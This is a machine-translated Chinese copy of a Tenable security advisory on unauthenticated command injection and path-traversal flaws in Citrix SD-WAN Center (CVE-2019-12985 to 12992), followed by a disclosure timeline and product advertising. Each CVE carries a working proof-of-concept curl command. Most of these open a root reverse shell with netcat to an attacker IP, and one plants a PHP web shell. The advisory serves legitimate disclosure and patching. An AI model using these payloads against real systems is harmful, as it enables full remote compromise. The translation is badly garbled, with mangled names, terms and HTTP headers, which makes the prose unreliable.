脸书 Google+ 微博 LinkedIn YouTube系统 RSS系统 菜单类 搜索 资源-博客 资源-Webinar 资源-报表 资源-事件 图标#066 图标_067 图标_068 图标_069 图标070

CitrixSD-WAN多维性中心

临界点

简表

多重漏洞发现于CitrixSD-WAN中心注释 : 自'www-data'用户被授予'sdo'特权以来,所有漏洞都可用以获取根访问权

CVE-2019-12985: /Collector/diagnostics/ping Unauthenticated Command Injection

诊断器操作极易由远程非认证攻击者指令注入具体地说,ping函数不完全验证或净化用于构建shell命令的HTTP请求参数值攻击者通过收集器控制器路由传输并提供编译值以表示ibadress、pingCount或packetSize

概念证明
ncip=192.168.1.191 ncport=4444 target=192.168.1.198  curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target/Collector/diagnostics/ping

CVE-2019-12986: /Collector/diagnostics/trace_route Unauthenticated Command Injection

trace_route诊断器操作易由远程非认证攻击者指令注入具体地说,try_route函数没有充分验证或净化用于构建shell命令的HTTP请求参数值攻击者通过收集器控制器路由传输并提供编译值

概念证明
ncip=192.168.1.191 ncport=4444 target=192.168.1.198  curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target/Collector/diagnostics/trace_route

CVE-2019-12987: /Collector/storagemgmt/apply Unauthenticated Command Injection

存储Mgmt操作易指令由远程非认证攻击者注入具体地说,调用StoragePerl函数不完全验证或净化用于构建shell命令的HTTP请求参数值攻击者通过收集器控制器路由传输并提供数组值并编译数值用于action、host、path或stype

概念证明
ncip=192.168.1.191 ncport=4444 target=192.168.1.198  curl --insecure 'https://'$target'/Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype'

CVE-2019-12988: /Collector/nms/addModifyZTDProxy Unauthenticated Command Injection

addmofifyZTDProxy操作具体地说,addifyZTDProxy函数不完全验证或净化用于构建外壳命令的HTTP请求参数值攻击者通过收集器控制器路由传输并提供ztd-password人工值可触发易失性

概念证明
ncip=192.168.1.191 ncport=4444 target=192.168.1.198  curl --insecure 'https://'$target'/Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(sudo$IFS/bin/nc$IFS-nv$IFS$(/bin/echo$IFS-e$IFS\x3'$ncip')$IFS$(/bin/echo$IFS-e$IFS\x3'$ncport')$IFS-e$IFS/bin/bash)'

CVE-2019-12990: /Collector/appliancesettings/applianceSettingsFileTransfer Unauthenticated Directory Traversal File Write

应用程序设置控制器中应用设置易转换动作很容易由远程非认证攻击者遍历目录具体地说,应用程序设置fileTransfer函数不完全验证或净化HTTP请求参数值,而该参数值用于构建文件系统路径攻击者通过收集器控制器路由传输并提供编译值以表示文件名、文件数据、工作空间i可使用此漏洞写文件到可写由'www-data'用户下载的位置攻击者可写出手写PHP文件/home/taliuser/www/app/webroot/files/执行任意PHP代码

概念证明
ncip=192.168.1.191 ncport=4444 target=192.168.1.198  curl --insecure -d 'filename=../../../../../../home/talariuser/www/app/webroot/files/shell.php&filedata=
              ' https://$target/Collector/appliancesettings/applianceSettingsFileTransfer curl --insecure https://$target/talari/app/files/shell.php

CVE-2019-12992:/用户/创建验证命令注入

用户管理员中的创建动作很容易受远程验证攻击者指令注入具体地说,创建函数无法充分验证或净化用于构建shell命令的HTTP请求参数值攻击者通过提供虚构值注释:当$级别比较整数值时(使用 ym),它转换为0正因如此验证传递类型校验对这里有帮助

概念证明
POST/用户/创建HTTP/1.1主机:192168.1198用户代理机:Mozilla/5.0英特尔 MacOSX10.14Gecko20100101Firefox/65.0接受:应用/json文本/javascriptq=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.198/Users?rdx=true Content-Type: application/x-www-form-urlencoded!字符集=UTF-8 X请求带式: XMLHtp请求内容链149连接Cookie:urhash构件=VWCSession=15jjk7584jmn9v5na2q6gspnc3  username=scooby&level=`sudo+touch+/var/tmp/vuln_6`&password=password&confirm_password=password&secAuth=false&csrf_token=9b97e4423f0f0bdf18e089b2de3c8e78
root-WANCenter:/opt/citrix/LS#s-l/var/tmp共0-r-r-r-

求解

升级为10.0.8或10.2.3安全更新

披露时间线

04/17/2019-发送 [email protected].90天日期为2019年7月17日
04/17/2019-Citrix确认收到报告并分配CASE-7736标识符
05/01/2019-可点名更新
05/01/2019-Citrix非认证即无法复制bugs请求澄清
05/02/2019-可租寄新poc
05/03/2019-Citrix感谢Tenable补充细节等有新消息后立即联系
05/10/2019-可租制后续检验新POC是否辅助复制
05/10/2019-Citrix可不经认证复制错误感谢附加信息他们没有释放日期表,但会随时通知我们
05/10/2019-可点名感谢Citrix更新提醒Citrix90天策略并请求90天日期
05/10/2019-可点名查询是否需要分配CVES和Citrix发布公告
05/13/2019-Citrix处理CVE任务安全公告2019年7月17号前发布
05/13/2019-可点名感谢Citrix更新
06/11/2019-可租通知10.2.3刚发布查询Citrix是否修复这些故障,因为我们无法成功下载新版本
06/12/2019-Citrix响应 : Citrix发布安全公告时会发布哪些版本有相关修正
06/12/2019-Tenable通知Citrix我们将披露日期移到8月21日,以便大容量披露更多SD-WAN漏洞
06/12/2019-Citrix确认新披露日期Citrix贴近披露日期协调安全公告中Tenable的信用
06/13/2019-可接受确认
06/26/2019-Citrix通知他们计划在未来两周发布公告期望未来几天有更具体日期问房客信用
06/27/2019-可租确认请求在决定更具体日期时更新信用看起来不错查询CVE标识符和补丁版号
7/02/2019-可点名请求更新
07/02/2019-备注10.2.3补全所有问题咨询发布

TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响

可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作 快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案

关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码

如有问题或更正,请发邮件[email protected]

风险信息

可租咨询ID
TRA-2019-31
信用

克里斯林

sv2基础/时间评分
10.0/8.3
sv2向量
(AV:N/AC:L/Au:N/C:C/I:C/A:C)
受影响产品
净标量SD-WAN9.x
净算器SD-WAN 10.0.x
CitrixSD-WAN10.x
CitrixSDWA 10.2.x
风险因子
临界点

咨询时间线

7/02/2019咨询发布
07/10/2019-附加公告链接和CVES更新受影响版本和解决方案

可耐受脆弱性管理

前称Tenable.io


完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

试可穿Nessus专业免费

免费7天

TenableNessus是当今市场最全面的脆弱感扫描器

New-Nessus专家
现可用

奈苏斯专家增加更多特征,包括外部攻击表面扫描能力以及添加域和扫描云基础设施能力点击这里尝试Nessus专家

填表后继续使用NessusPro测试

可买Nessus专业

TenableNessus是当今市场最全面的脆弱感扫描器可租Nessus专业程序帮助脆弱性扫描自动化,在守法周期中省时并允许你加入IT团队

购买多年度许可证并保存添加高级支持访问电话、社区聊天支持全天365天全天24小时

选择您的许可

购买多年度许可证并保存

添加支持培训

tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

tenable.io 付费

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

可租WebApp扫描试

前称Tenable.ioWeb应用扫描

完全存取最新网络应用扫描服务 设计现代应用安全扫描全在线组合漏洞高精度而不人工重创或干扰关键网络应用现在就签名

可租WebApp扫描实验中也包括可租易用性管理、可租可租鲁明和可租云安全

可租WebApp扫描

前称Tenable.ioWeb应用扫描

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

5 FQDNs

3 578美元

立即购买

试可腾鲁明

可视化并探索接触管理,跟踪随时间推移降低风险,并参照Tenablelumin对等基准

可点Lumin测试中也包括可点易点管理、可点WebApp扫描和可点云安全

可买路明

联系销售代表,看可租Lumin如何帮助你在整个组织中获取洞察力并管理网络风险

试可耐云安全

前称可租.cs

完全无障碍检测并修复云基础设施误配置并观察运行时漏洞注册免费测试了解更多试验过程点击这里

可租云安全测试中也包括可租易用性管理、可租可租鲁明和可租WebApp扫描

联系人a购买可租云安全

联系销售代表了解更多可耐云安全知识,并观察多易登录云账号并在分钟内为云误配置和漏洞获取可见度

试可耐奈苏斯专家免费

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

已经有TenableNessus专业
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

试Nessus免费专家

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

内索斯职业类
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

Baidu
map